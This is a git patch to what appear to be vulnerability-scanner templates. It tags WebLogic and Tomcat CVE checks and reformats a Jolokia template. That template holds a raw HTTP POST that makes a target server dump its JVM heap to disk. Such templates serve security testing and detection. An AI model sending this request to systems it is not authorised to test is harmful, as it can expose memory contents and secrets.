From e2a0f93f79f6cd696277a4c53460a5468e2a4a86 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 2 Jul 2021 18:24:31 +0530
Subject: [PATCH] misc updates

---
 cves/2018/CVE-2018-2628.yaml                  |  2 +-
 cves/2018/CVE-2018-2893.yaml                  |  2 +-
 cves/2020/CVE-2020-1938.yaml                  |  2 +-
 .../jolokia/jolokia-heap-info-disclosure.yaml | 35 ++++++++++---------
 4 files changed, 22 insertions(+), 19 deletions(-)

diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml
index 613a0793b1..0421d15888 100644
--- a/cves/2018/CVE-2018-2628.yaml
+++ b/cves/2018/CVE-2018-2628.yaml
@@ -5,7 +5,7 @@ info:
   author: milo2012
   severity: high
   reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
-  tags: cve,cve2018,oracle,weblogic
+  tags: cve,cve2018,oracle,weblogic,network
 
 network:
   - inputs:
diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml
index 888becc02f..4fc9fa8c42 100644
--- a/cves/2018/CVE-2018-2893.yaml
+++ b/cves/2018/CVE-2018-2893.yaml
@@ -4,7 +4,7 @@ info:
   name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893)
   author: milo2012
   severity: high
-  tags: cve,cve2018,weblogic
+  tags: cve,cve2018,weblogic,network
   reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
 
 network:
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
index b09a48519c..14c505aa53 100644
--- a/cves/2020/CVE-2020-1938.yaml
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -5,7 +5,7 @@ info:
   author: milo2012
   severity: high
   reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
-  tags: cve,cve2020,apache,tomcat,lfi
+  tags: cve,cve2020,apache,tomcat,lfi,network
 
 network:
   - inputs:
diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
index 840be8e54a..cd7dd6cd13 100644
--- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
+++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml
@@ -9,23 +9,26 @@ info:
 requests:
   - raw:
       - |
-            POST /jolokia/ HTTP/1.1
-            Host: {{Hostname}}
-            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
-            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
-            Accept-Language: en-GB,en;q=0.5
-            Accept-Encoding: gzip, deflate
-            Connection: close
-            Upgrade-Insecure-Requests: 1
-            Content-Type: application/x-www-form-urlencoded
-            Content-Length: 136
+        POST /jolokia/ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
+        Accept-Language: en-GB,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 136
 
-            {
-            "type":"EXEC",
-            "mbean":"com.sun.management:type=HotSpotDiagnostic",
-            "operation":"dumpHeap",
-            "arguments":["/tmp1234/test1.hprof",0]
-            }
+        {
+           "type":"EXEC",
+           "mbean":"com.sun.management:type=HotSpotDiagnostic",
+           "operation":"dumpHeap",
+           "arguments":[
+              "/tmp1234/test1.hprof",
+              0
+           ]
+        }
 
     matchers:
       - type: word